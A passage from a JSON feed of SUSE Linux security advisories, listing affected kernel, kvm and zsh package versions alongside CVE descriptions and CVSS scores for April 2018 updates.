"kernel-trace-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-extra-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": 
"SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-source-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-base-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-trace-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", 
"arch": "x86_64", "packageFilename": "kernel-default-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-devel-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": 
"kernel-ec2-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "noarch", "packageFilename": "kernel-docs-3.0.101-108.38.1.noarch.rpm", "packageName": "kernel-docs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-syms-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-syms-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-devel-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default-devel", 
"operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-extra-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-source-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-ppc64-devel-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-ppc64-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-xen-base-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-xen-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", 
"packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-man-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-man", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-source-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": 
"kernel-default-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae", "operator": "lt"}], "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - 
CVE-2017-5715: Systems with microprocessors utilizing speculative\n execution and indirect branch prediction may allow unauthorized\n disclosure of information to an attacker with local user access via a\n side-channel analysis (bnc#1068032).\n\n Enhancements and bugfixes over the previous fixes have been added to\n this kernel.\n\n - CVE-2018-10087: The kernel_wait4 function in kernel/exit.c might have\n allowed local users to cause a denial of service by triggering an\n attempted use of the -INT_MIN value (bnc#1089608).\n - CVE-2018-7757: Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c allowed local users to cause a denial\n of service (memory consumption) via many read accesses to files in the\n /sys/class/sas_phy directory, as demonstrated by the\n /sys/class/sas_phy/phy-1:0:12/invalid_dword_count file (bnc#1084536).\n - CVE-2018-7566: There was a buffer overflow via an\n SNDRV_SEQ_IOCTL_SET_CLIENT_POOL ioctl write operation to /dev/snd/seq by\n a local user (bnc#1083483).\n - CVE-2017-0861: Use-after-free vulnerability in the snd_pcm_info function\n in the ALSA subsystem allowed attackers to gain privileges via\n unspecified vectors (bnc#1088260).\n - CVE-2018-8822: Incorrect buffer length handling in the ncp_read_kernel\n function in fs/ncpfs/ncplib_kernel.c could be exploited by malicious\n NCPFS servers to crash the kernel or execute code (bnc#1086162).\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel\n v4l2 video driver. (bnc#1072865).\n - CVE-2017-18203: The dm_get_from_kobject function in drivers/md/dm.c\n allowed local users to cause a denial of service (BUG) by leveraging a\n race condition with __dm_destroy during creation and removal of DM\n devices (bnc#1083242).\n - CVE-2017-16911: The vhci_hcd driver allowed local attackers to\n disclose kernel memory addresses. 
Successful exploitation requires that\n a USB device is attached over IP (bnc#1078674).\n - CVE-2017-18208: The madvise_willneed function in mm/madvise.c allowed local\n users to cause a denial of service (infinite loop) by triggering use of\n MADVISE_WILLNEED for a DAX mapping (bnc#1083494).\n - CVE-2017-16644: The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c allowed local users to cause a\n denial of service (improper error handling and system crash) or possibly\n have unspecified other impact via a crafted USB device (bnc#1067118).\n - CVE-2018-6927: The futex_requeue function in kernel/futex.c in the Linux\n kernel might allow attackers to cause a denial of service (integer\n overflow) or possibly have unspecified other impact by triggering a\n negative wake or requeue value (bnc#1080757).\n - CVE-2017-16914: The \"stub_send_ret_submit()\" function\n (drivers/usb/usbip/stub_tx.c) allowed attackers to cause a denial of\n service (NULL pointer dereference) via a specially crafted USB over IP\n packet (bnc#1078669).\n - CVE-2016-7915: The hid_input_field function in drivers/hid/hid-core.c\n allowed physically proximate attackers to obtain sensitive information\n from kernel memory or cause a denial of service (out-of-bounds read) by\n connecting a device, as demonstrated by a Logitech DJ receiver\n (bnc#1010470).\n - CVE-2015-5156: The virtnet_probe function in drivers/net/virtio_net.c\n attempted to support a FRAGLIST feature without proper memory\n allocation, which allowed guest OS users to cause a denial of service\n (buffer overflow and memory corruption) via a crafted sequence of\n fragmented packets (bnc#940776).\n - CVE-2017-12190: The bio_map_user_iov and bio_unmap_user functions in\n block/bio.c did unbalanced refcounting when a SCSI I/O vector has small\n consecutive buffers belonging to the same page. 
The bio_add_pc_page\n function merges them into one, but the page reference is never dropped.\n This causes a memory leak and possible system lockup (exploitable\n against the host OS by a guest OS user, if a SCSI disk is passed through\n to a virtual machine) due to an out-of-memory condition (bnc#1062568).\n - CVE-2017-16912: The \"get_pipe()\" function (drivers/usb/usbip/stub_rx.c)\n allowed attackers to cause a denial of service (out-of-bounds read) via\n a specially crafted USB over IP packet (bnc#1078673).\n - CVE-2017-16913: The \"stub_recv_cmd_submit()\" function\n (drivers/usb/usbip/stub_rx.c) when handling CMD_SUBMIT packets allowed\n attackers to cause a denial of service (arbitrary memory allocation) via\n a specially crafted USB over IP packet (bnc#1078672).\n\n The following non-security bugs were fixed:\n\n - af_iucv: enable control sends in case of SEND_SHUTDOWN (bnc#1085513,\n LTC#165135).\n - cifs: fix buffer overflow in cifs_build_path_to_root() (bsc#1085113).\n - drm/mgag200: fix a test in mga_vga_mode_valid() (bsc#1087092).\n - hrtimer: Ensure POSIX compliance (relative CLOCK_REALTIME hrtimers)\n (bnc#1013018).\n - hrtimer: Reset hrtimer cpu base proper on CPU hotplug (bnc#1013018).\n - ide-cd: workaround VMware ESXi cdrom emulation bug (bsc#1080813).\n - ipc/msg: introduce msgctl(MSG_STAT_ANY) (bsc#1072689).\n - ipc/sem: introduce semctl(SEM_STAT_ANY) (bsc#1072689).\n - ipc/shm: introduce shmctl(SHM_STAT_ANY) (bsc#1072689).\n - jffs2: Fix use-after-free bug in jffs2_iget()'s error handling path\n (git-fixes).\n - kabi: x86/kaiser: properly align trampoline stack.\n - keys: do not let add_key() update an uninstantiated key (bnc#1063416).\n - keys: prevent creating a different user's keyrings (bnc#1065999).\n - leds: do not overflow sysfs buffer in led_trigger_show (bsc#1080464).\n - mm/mmap.c: do not blow on PROT_NONE MAP_FIXED holes in the stack\n (bnc#1039348).\n - nfsv4: fix getacl head length estimation (git-fixes).\n - pci: Use function 0 VPD 
for identical functions, regular VPD for others\n (bnc#943786 git-fixes).\n - pipe: actually allow root to exceed the pipe buffer limits (git-fixes).\n - posix-timers: Protect posix clock array access against speculation\n (bnc#1081358).\n - powerpc/pseries: Support firmware disable of RFI flush (bsc#1068032,\n bsc#1075088).\n - qeth: repair SBAL elements calculation (bnc#1085513, LTC#165484).\n - Revert \"USB: cdc-acm: fix broken runtime suspend\" (bsc#1067912)\n - s390/qeth: fix underestimated count of buffer elements (bnc#1082091,\n LTC#164529).\n - scsi: sr: workaround VMware ESXi cdrom emulation bug (bsc#1080813).\n - usbnet: Fix a race between usbnet_stop() and the BH (bsc#1083275).\n - x86-64: Move the \"user\" vsyscall segment out of the data segment\n (bsc#1082424).\n - x86/espfix: Fix return stack in do_double_fault() (bsc#1085279).\n - x86/kaiser: properly align trampoline stack (bsc#1087260).\n - x86/retpoline: do not perform thunk calls in ring3 vsyscall code\n (bsc#1085331).\n - xen/x86/asm/traps: Disable tracing and kprobes in fixup_bad_iret and\n sync_regs (bsc#909077).\n - xen/x86/cpu: Check speculation control CPUID bit (bsc#1068032).\n - xen/x86/cpu: Factor out application of forced CPU caps (bsc#1075994\n bsc#1075091).\n - xen/x86/cpu: Fix bootup crashes by sanitizing the argument of the\n 'clearcpuid=' command-line option (bsc#1065600).\n - xen/x86/cpu: Sync CPU feature flags late (bsc#1075994 bsc#1075091).\n - xen/x86/entry: Use IBRS on entry to kernel space (bsc#1068032).\n - xen/x86/idle: Toggle IBRS when going idle (bsc#1068032).\n - xen/x86/kaiser: Move feature detection up (bsc#1068032).\n - xfs: check for buffer errors before waiting (bsc#1052943).\n - xfs: fix allocbt cursor leak in xfs_alloc_ag_vextent_near (bsc#1087762).\n - xfs: really fix the cursor leak in xfs_alloc_ag_vextent_near\n (bsc#1087762).\n\n", "edition": 1, "reporter": "Suse", "published": "2018-04-25T21:07:11", "title": "Security update for the Linux Kernel (important)", 
"type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-8822", "CVE-2017-16913", "CVE-2018-7566", "CVE-2017-0861", "CVE-2017-18203", "CVE-2017-16912", "CVE-2018-6927", "CVE-2018-7757", "CVE-2017-13166", "CVE-2016-7915", "CVE-2017-5715", "CVE-2015-5156", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-10087", "CVE-2017-16644", "CVE-2017-12190", "CVE-2017-16914"], "modified": "2018-04-25T21:07:11", "id": "SUSE-SU-2018:1080-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00072.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-25T19:36:39", "references": ["https://bugzilla.suse.com/1076179", "https://bugzilla.suse.com/1082276", "https://bugzilla.suse.com/1068032", "https://bugzilla.suse.com/1076114", "https://bugzilla.suse.com/1083291"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "1.4.2-60.9.1", "arch": "x86_64", "packageFilename": "kvm-1.4.2-60.9.1.x86_64.rpm", "packageName": "kvm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "1.4.2-60.9.1", "arch": "i586", "packageFilename": "kvm-1.4.2-60.9.1.i586.rpm", "packageName": "kvm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "1.4.2-60.9.1", "arch": "s390x", "packageFilename": "kvm-1.4.2-60.9.1.s390x.rpm", "packageName": "kvm", "operator": "lt"}], "description": "This update for kvm fixes the following issues:\n\n - This update has the next round of Spectre v2 related patches, which now\n integrates with corresponding changes in libvirt. A January 2018 release\n of qemu initially addressed the Spectre v2 vulnerability for KVM guests\n by exposing the spec-ctrl feature for all x86 vcpu types, which was the\n quick and dirty approach, but not the proper solution. We remove that\n initial patch and now rely on patches from upstream. 
This update defines\n spec_ctrl and ibpb cpu feature flags as well as new cpu models which are\n clones of existing models with either -IBRS or -IBPB added to the end of the\n model name. These new vcpu models explicitly include the new\n feature(s), whereas the feature flags can be added to the cpu parameter\n as with other features. In short, for continued Spectre v2 protection,\n ensure that either the appropriate cpu feature flag is added to the\n QEMU command-line, or one of the new cpu models is used. Although\n migration from older versions is supported, the new cpu features won't\n be properly exposed to the guest until it is restarted with the cpu\n features explicitly added. A reboot is insufficient.\n - A warning patch is added which attempts to detect a migration from a\n qemu version which had the quick and dirty fix (it only detects certain\n cases, but hopefully is helpful.) For additional information on Spectre\n v2 as it relates to QEMU, see:\n https://www.qemu.org/2018/02/14/qemu-2-11-1-and-spectre-update/\n (CVE-2017-5715 bsc#1068032)\n - A patch is added to continue to detect Spectre v2 mitigation features\n (as shown by cpuid), and if found provide that feature to guests, even\n if running on older KVM (kernel) versions which do not yet expose that\n feature to QEMU. (bsc#1082276) These two patches will be removed when we\n can reasonably assume everyone is running with the appropriate updates.\n\n - Security fixes for the following CVE issues: (bsc#1076114 CVE-2018-5683)\n (bsc#1083291 CVE-2018-7550)\n - This patch is already included, add here for CVE track (bsc#1076179\n CVE-2017-18030)\n\n - Toolchain changes have caused the built size of pxe-virtio.rom to exceed\n 64K. 
Tweak rarely used strings in code to reduce size of the binary so\n it fits again.\n\n - Eliminate bogus use of CPUID_7_0_EDX_PRED_CMD which we've carried since\n the initial Spectre v2 patch was added. EDX bit 27 of CPUID Leaf 07H,\n Sub-leaf 0 provides status on STIBP, and not the PRED_CMD MSR. Exposing\n the STIBP CPUID feature bit to the guest is wrong in general, since the\n VM doesn't directly control the scheduling of physical hyperthreads.\n This is left strictly to the L0 hypervisor.\n\n", "edition": 1, "reporter": "Suse", "published": "2018-04-25T18:14:14", "title": "Security update for kvm (important)", "type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-5683", "CVE-2017-5715", "CVE-2017-18030", "CVE-2018-7550"], "modified": "2018-04-25T18:14:14", "id": "SUSE-SU-2018:1077-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00071.html", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-25T19:36:39", "references": ["https://bugzilla.suse.com/1082977", "https://bugzilla.suse.com/1082991", "https://bugzilla.suse.com/1082998", "https://bugzilla.suse.com/1087026", "https://bugzilla.suse.com/896914", "https://bugzilla.suse.com/1083002", "https://bugzilla.suse.com/1082885", "https://bugzilla.suse.com/1082975", "https://bugzilla.suse.com/1083250", "https://bugzilla.suse.com/1084656"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "ppc64le", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.ppc64le.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "ppc64le", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.ppc64le.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": 
"x86_64", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "aarch64", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.aarch64.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "s390x", "packageFilename": "zsh-5.0.5-6.7.2.s390x.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "ppc64le", "packageFilename": "zsh-5.0.5-6.7.2.ppc64le.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "aarch64", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.aarch64.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "s390x", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.s390x.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "s390x", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.s390x.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": 
